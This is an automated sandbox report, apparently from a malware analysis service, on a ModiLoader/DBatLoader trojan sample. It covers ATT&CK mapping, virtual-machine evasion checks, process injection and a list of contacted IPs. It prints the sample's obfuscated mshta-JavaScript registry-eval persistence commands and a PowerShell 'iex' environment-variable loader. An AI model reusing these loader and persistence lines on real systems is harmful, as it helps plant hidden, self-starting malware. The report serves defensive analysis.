Malware Analysis Report

2024-08-06 14:38

Sample ID 240523-nrv5zaef2v
Target 6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118
SHA256 7714f1c339a22c229e0615d32fe5f47825e479abc96eb23689a226208eb33411
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7714f1c339a22c229e0615d32fe5f47825e479abc96eb23689a226208eb33411

Threat Level: Known bad

The file 6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Looks for VirtualBox drivers on disk

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox Guest Additions in registry

Adds policy Run key to start application

Looks for VMWare Tools registry key

Deletes itself

Checks BIOS information in registry

Checks computer location settings

Adds Run key to start application

Maps connected drives based on registry

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
File and Directory Discovery
T1083
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-23 11:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-23 11:38

Reported

2024-05-23 11:40

Platform

win7-20240221-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:LXU3aQ3Z=\"Id1A73m\";Y5j=new%20ActiveXObject(\"WScript.Shell\");F6CE4DaPi=\"68AeAVTke\";k2uxu=Y5j.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\37bbe06315\\\\afdf89ec\");eurxGs75hV=\"uxp1\";eval(k2uxu);Vtf0Jzai3C=\"aXz\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:iHBc4qW7=\"pRqR\";c99V=new%20ActiveXObject(\"WScript.Shell\");HLRQ0Fi8fw=\"dF0\";kCFh8=c99V.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\37bbe06315\\\\afdf89ec\");zy11mmFP=\"altqS\";eval(kCFh8);wpGA90Bxu=\"WohCrf\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:M0bCqXPSX=\"dLxo30V\";qz5=new%20ActiveXObject(\"WScript.Shell\");GAkbt4ewR=\"L1sNr4\";Tur0B3=qz5.RegRead(\"HKCU\\\\software\\\\37bbe06315\\\\afdf89ec\");pe4CLIu=\"4\";eval(Tur0B3);M9TIrrI8=\"nH\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2696 set thread context of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2696 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe
PID 2908 wrote to memory of 2432 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2908 wrote to memory of 2432 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2908 wrote to memory of 2432 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2908 wrote to memory of 2432 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2432 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2432 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2432 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2432 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2432 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2432 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2432 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 2396 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 2396 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 2396 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 2396 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 2396 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 2396 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2468 wrote to memory of 2396 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:ajKeMj82jz="Qp683ERT";u55P=new%20ActiveXObject("WScript.Shell");WTh5tCjPr="SZ5v";AvPu8=u55P.RegRead("HKLM\\software\\Wow6432Node\\A4ACHS\\vBuZqBdSsr");CSj6qUX="ZZELCd";eval(AvPu8);qBpNXrkZ3="BLYQg64SKq";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:dwqrn

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 202.40.59.98:80 tcp
CN 14.116.199.250:80 tcp
AU 110.151.80.22:8080 tcp
RU 195.68.160.37:80 tcp
US 18.53.235.29:80 tcp
US 55.73.85.82:80 tcp
BR 191.39.232.6:80 tcp
US 46.232.75.201:80 tcp
CA 131.141.120.110:80 tcp
US 192.170.122.109:80 tcp
FR 93.28.253.120:80 tcp
US 166.184.135.170:8080 tcp
NL 51.136.20.96:80 tcp
US 168.166.93.146:80 tcp
KR 211.215.150.49:8080 tcp
BR 177.201.113.103:80 tcp
US 163.234.226.50:80 tcp
JP 124.26.21.132:80 tcp
US 199.69.205.76:80 tcp
US 162.100.91.14:8080 tcp
US 150.184.186.59:80 tcp
GB 94.5.32.108:443 tcp
US 19.78.224.62:80 tcp
CN 171.85.11.235:80 tcp
KR 122.33.19.218:443 tcp
BR 189.75.127.101:80 tcp
KR 114.111.253.248:80 tcp
MU 41.67.218.17:80 tcp
US 158.136.126.146:80 tcp
US 96.204.254.23:80 tcp
US 139.55.188.38:443 tcp
US 147.56.48.163:80 tcp
SI 212.118.70.175:80 tcp
CN 58.223.252.64:80 tcp
US 104.224.42.99:443 tcp
IT 82.58.196.218:80 tcp
US 215.67.167.36:80 tcp
IT 78.222.162.19:80 tcp
IT 155.185.68.229:80 tcp
AU 164.53.123.241:80 tcp
PK 39.54.109.159:80 tcp
DE 77.6.188.12:80 tcp
ID 120.178.139.179:443 tcp
CN 114.240.33.252:80 tcp
US 13.18.165.97:80 tcp
BR 177.168.82.71:80 tcp
CN 69.234.246.182:80 tcp
DK 77.66.88.2:80 tcp
BR 179.139.122.184:80 tcp
TW 220.134.250.209:80 tcp
US 192.14.149.234:80 tcp
CN 123.161.239.95:80 tcp
UA 31.131.110.99:80 tcp
KR 182.229.104.124:80 tcp
TW 211.77.5.2:80 tcp
US 21.208.158.87:80 tcp
US 19.220.43.244:80 tcp
ZA 137.171.189.18:443 tcp
FR 195.36.211.75:80 tcp
NZ 182.154.225.33:80 tcp
US 214.22.200.227:80 tcp
JP 180.4.102.76:80 tcp
FR 195.36.211.75:80 195.36.211.75 tcp
US 209.34.13.119:80 tcp
EG 45.102.48.157:80 tcp
HU 91.82.62.16:8080 tcp
US 34.196.99.123:80 tcp
US 28.234.112.73:8080 tcp
DE 91.14.186.170:80 tcp
US 35.137.253.123:80 tcp
NL 81.58.58.55:80 tcp
US 198.94.9.29:80 tcp
CN 113.55.20.135:8080 tcp
MA 196.118.113.206:80 tcp
RU 79.164.166.63:80 tcp
US 75.70.113.163:8080 tcp
US 16.80.172.121:80 tcp
US 32.33.154.230:80 tcp
IT 151.58.216.32:8080 tcp
NL 212.238.234.254:80 tcp
DE 141.71.80.24:80 tcp
US 65.112.195.195:80 tcp
CL 190.215.35.186:80 tcp
RU 188.168.1.28:80 tcp
MX 148.248.47.56:80 tcp
US 67.94.187.91:443 tcp
CN 140.143.222.164:80 tcp
GB 25.56.216.135:8080 tcp
US 75.131.48.96:80 tcp
US 209.186.200.48:80 tcp
GB 25.203.42.155:80 tcp
US 208.97.201.130:80 tcp
US 4.59.50.231:80 tcp
DE 212.173.135.216:80 tcp
GB 25.106.57.198:80 tcp
SA 188.49.133.4:8080 tcp
JP 150.94.175.198:80 tcp
CH 159.103.150.188:80 tcp
CN 110.89.208.159:80 tcp
BR 181.220.173.10:80 tcp
LS 197.231.55.71:80 tcp
MY 210.187.39.216:80 tcp
CN 60.204.83.77:80 tcp
KR 27.117.178.42:80 tcp
US 184.83.242.197:80 tcp
DE 51.233.222.62:8080 tcp
US 135.32.12.25:8080 tcp
MX 187.207.97.79:80 tcp
SE 147.14.18.254:80 tcp
JP 49.111.107.29:80 tcp
US 26.116.247.99:80 tcp
US 99.132.188.18:80 tcp
JP 220.109.237.154:80 tcp
CN 182.127.131.132:8080 tcp
CR 201.202.112.248:80 tcp
MU 196.163.177.231:80 tcp
US 76.228.70.168:8080 tcp
CN 222.203.159.25:80 tcp
IT 82.62.235.74:80 tcp
CA 142.210.238.29:80 tcp
US 56.125.72.7:80 tcp
CN 118.206.54.102:80 tcp
US 100.49.164.179:80 tcp
NO 4.179.107.122:80 tcp
SA 93.168.230.188:80 tcp
US 108.164.121.2:8080 tcp
NL 163.175.242.239:80 tcp
US 132.253.170.118:80 tcp
US 24.191.118.223:80 tcp
GB 84.65.90.233:8080 tcp
US 35.107.118.251:80 tcp
CN 159.226.164.164:80 tcp
FR 195.36.211.75:80 195.36.211.75 tcp
GB 109.249.204.227:80 tcp
US 54.56.178.242:443 tcp
US 56.116.99.2:80 tcp
US 206.181.57.218:80 tcp
KR 121.154.188.71:80 tcp
RU 109.61.180.233:80 tcp
US 3.90.61.130:80 tcp
US 24.49.146.138:80 tcp
US 33.205.151.111:80 tcp
US 137.139.114.162:80 tcp
US 167.78.145.81:80 tcp
JP 126.238.140.60:80 tcp
US 144.80.28.181:80 tcp
US 161.242.241.51:80 tcp
US 44.95.185.85:80 tcp

Files

memory/1956-1-0x00000000001B0000-0x00000000002AA000-memory.dmp

memory/2696-4-0x0000000000390000-0x0000000000394000-memory.dmp

memory/1956-6-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1956-8-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1956-24-0x0000000000330000-0x00000000003F0000-memory.dmp

memory/1956-23-0x0000000000330000-0x00000000003F0000-memory.dmp

memory/1956-18-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1956-26-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1956-25-0x0000000000401000-0x0000000000404000-memory.dmp

memory/1956-22-0x0000000000330000-0x00000000003F0000-memory.dmp

memory/1956-21-0x0000000000330000-0x00000000003F0000-memory.dmp

memory/1956-20-0x0000000000330000-0x00000000003F0000-memory.dmp

memory/1956-19-0x0000000000330000-0x00000000003F0000-memory.dmp

memory/1956-16-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1956-14-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1956-10-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1956-12-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1956-3-0x0000000000400000-0x0000000001400000-memory.dmp

memory/2432-36-0x00000000062C0000-0x0000000006380000-memory.dmp

memory/2468-38-0x0000000000AD0000-0x0000000000AD7000-memory.dmp

memory/2432-39-0x00000000062C0000-0x0000000006380000-memory.dmp

memory/2468-41-0x0000000000AD0000-0x0000000000AD7000-memory.dmp

memory/2468-47-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-46-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-42-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-45-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-44-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-43-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-50-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-49-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-54-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-53-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-52-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-51-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-48-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-56-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-55-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2396-57-0x0000000000AD0000-0x0000000000AD7000-memory.dmp

memory/2396-60-0x0000000000130000-0x00000000001F0000-memory.dmp

memory/2396-59-0x0000000000AD0000-0x0000000000AD7000-memory.dmp

memory/2396-61-0x0000000000130000-0x00000000001F0000-memory.dmp

memory/2396-65-0x0000000000130000-0x00000000001F0000-memory.dmp

memory/2396-64-0x0000000000130000-0x00000000001F0000-memory.dmp

memory/2396-63-0x0000000000130000-0x00000000001F0000-memory.dmp

memory/2396-62-0x0000000000130000-0x00000000001F0000-memory.dmp

memory/2468-66-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-70-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-73-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-72-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-71-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-69-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-68-0x0000000000090000-0x0000000000150000-memory.dmp

memory/2468-67-0x0000000000090000-0x0000000000150000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-23 11:38

Reported

2024-05-23 11:40

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ad0a85169e52a59e162bf0ac1aa2d71_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

